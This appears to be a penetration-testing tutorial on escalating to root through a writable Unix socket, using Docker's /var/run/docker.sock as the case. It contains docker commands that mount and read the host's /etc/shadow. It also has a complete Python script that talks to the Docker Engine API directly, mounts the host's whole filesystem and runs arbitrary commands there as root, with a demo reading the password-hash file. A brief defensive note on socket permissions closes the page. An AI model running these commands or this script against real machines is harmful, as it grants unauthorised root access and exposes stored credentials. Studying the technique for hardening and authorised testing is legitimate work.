Unix Socket Exploitation

A Unix (domain) socket is another *nix component that can be leveraged to escalate privileges. A socket is only as safe as the file permissions, and any authentication the listening service performs, that were put in place before it was exposed. As you can imagine, that is not always done.

The easiest example to follow of an insufficiently secured Unix socket is Docker. By design, the docker daemon listens on a Unix socket (/var/run/docker.sock) instead of a TCP port. By default that socket is owned by root, with the docker group as its group owner, and the daemon itself always runs as root: whoever can write to the socket is handing instructions to a root process.

Suppose you land on a machine as an unprivileged user who happens to be able to run the docker command because they are a member of the docker group. That membership is the weak permission: it grants read/write access to the daemon's socket, and the daemon performs no further authorization before carrying out what it is asked.

Let's see how we could escalate our privileges on that machine. Specifically, let's read /etc/shadow, which is root-only on the host, by bind-mounting it into a container whose processes run as root.

# Bind-mount the host's /etc/shadow into the container; the daemon (running as root) performs the mount.
# Newer postgres images exit unless POSTGRES_PASSWORD is set (add -e POSTGRES_PASSWORD=x); the image choice is arbitrary.
docker run -v /etc/shadow:/docker/hashedpasswords -d postgres
# Processes inside the container run as root, so the mounted file is readable directly.
docker exec -ti {CONTAINER_ID} bash
# The copy and chmod below are not required; `cat /docker/hashedpasswords` already works as root.
root@XXXXXXXXXXXX:/# cat /docker/hashedpasswords > /docker/test.txt
root@XXXXXXXXXXXX:/# chmod 777 /docker/test.txt
root@XXXXXXXXXXXX:/# cat /docker/test.txt
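The docker CLI is only a client; the real boundary is the socket's file permissions. The following is an added example, not code from the original page or from the Docker project, that talks to the Docker Engine API over the Unix socket without the CLI, reports which permission class (owner, group, other) gives the current user write access, and generalises the shadow-file mount above to bind-mounting the host's entire root filesystem and running an arbitrary command in it as root. It assumes the default socket path /var/run/docker.sock, that an alpine image can be pulled or is already present, and that the daemon accepts unversioned API paths (the current API version is then used); the log frame format and sample bytes in the test are constructed from the Engine API's documented multiplexed stream layout.

```python
"""Drive the Docker Engine API directly over its Unix socket.

Added example (not from the original page or from Docker). Assumptions:
the daemon socket is /var/run/docker.sock, the 'alpine' image can be pulled,
and unversioned API paths are accepted (current API version is used).
"""
import http.client
import json
import os
import socket
import stat

DOCKER_SOCK = "/var/run/docker.sock"  # assumed default dockerd listen path


def classify_access(st_uid, st_gid, mode, uid, gids):
    """Explain why a process (uid, gids) can write a file (st_uid, st_gid, mode).

    Returns 'owner', 'group', 'other' or None. Mirrors the kernel's ordered
    check: if the uid matches only the owner bits count, otherwise if the gid
    is one of the caller's groups only the group bits count, otherwise 'other'.
    """
    if st_uid == uid:
        return "owner" if mode & stat.S_IWUSR else None
    if st_gid in gids:
        return "group" if mode & stat.S_IWGRP else None
    return "other" if mode & stat.S_IWOTH else None


def socket_access(path=DOCKER_SOCK):
    """Permission class through which the current process can write `path`."""
    st = os.stat(path)
    gids = set(os.getgroups()) | {os.getegid()}
    return classify_access(st.st_uid, st.st_gid, st.st_mode, os.geteuid(), gids)


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over AF_UNIX: the Engine API is plain HTTP on the socket."""

    def __init__(self, path):
        super().__init__("localhost")
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.connect(self.unix_path)


def api(method, path, body=None, sock_path=DOCKER_SOCK):
    """One request/response against the daemon; raises on HTTP errors."""
    conn = UnixHTTPConnection(sock_path)
    headers, data = {}, None
    if body is not None:
        data = json.dumps(body).encode()
        headers["Content-Type"] = "application/json"
    conn.request(method, path, body=data, headers=headers)
    resp = conn.getresponse()
    raw = resp.read()
    conn.close()
    if resp.status >= 400:
        raise RuntimeError(f"{method} {path} -> {resp.status}: {raw.decode(errors='replace')}")
    return raw


def create_request(cmd, image="alpine", host_root="/host"):
    """Body for POST /containers/create: bind-mount the host's / at host_root
    and run cmd chrooted into it. Binds entries are 'host_path:container_path';
    the page's example is the special case '/etc/shadow:/docker/hashedpasswords'."""
    return {
        "Image": image,
        "Cmd": ["chroot", host_root, "/bin/sh", "-c", cmd],
        "HostConfig": {"Binds": [f"/:{host_root}"]},
    }


def demux_logs(stream):
    """Split the multiplexed log stream from GET /containers/{id}/logs.

    Each frame is: 1 byte stream id (1 = stdout, 2 = stderr), 3 zero bytes,
    4-byte big-endian payload length, then the payload.
    """
    frames, i = [], 0
    while i + 8 <= len(stream):
        stream_id = stream[i]
        size = int.from_bytes(stream[i + 4:i + 8], "big")
        frames.append((stream_id, stream[i + 8:i + 8 + size]))
        i += 8 + size
    return frames


def run_on_host(cmd, image="alpine", sock_path=DOCKER_SOCK):
    """Run cmd as root inside the host's filesystem and return its stdout."""
    api("POST", f"/images/create?fromImage={image}&tag=latest", sock_path=sock_path)
    cid = json.loads(api("POST", "/containers/create", create_request(cmd, image), sock_path))["Id"]
    api("POST", f"/containers/{cid}/start", sock_path=sock_path)
    api("POST", f"/containers/{cid}/wait", sock_path=sock_path)
    frames = demux_logs(api("GET", f"/containers/{cid}/logs?stdout=true&stderr=true", sock_path=sock_path))
    api("DELETE", f"/containers/{cid}", sock_path=sock_path)
    return b"".join(p for sid, p in frames if sid == 1).decode(errors="replace")


if __name__ == "__main__":
    print("socket writable via:", socket_access())
    print(run_on_host("head -n 1 /etc/shadow"))
```

Note the ordered check in classify_access: a user who owns the socket but has no owner write bit is refused even if the group bits would allow it, which is how the kernel evaluates permission classes. The usual defence follows from the same logic: keep the socket 0660 root:docker and treat docker group membership as equivalent to sudo, or run the daemon in rootless mode so the socket belongs to an unprivileged daemon.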

Two more interesting examples of leveraging Unix sockets for privilege escalation are the following: https://www.exploit-db.com/exploits/40962/ and https://github.com/rapid7/metasploit-framework/pull/9408/files
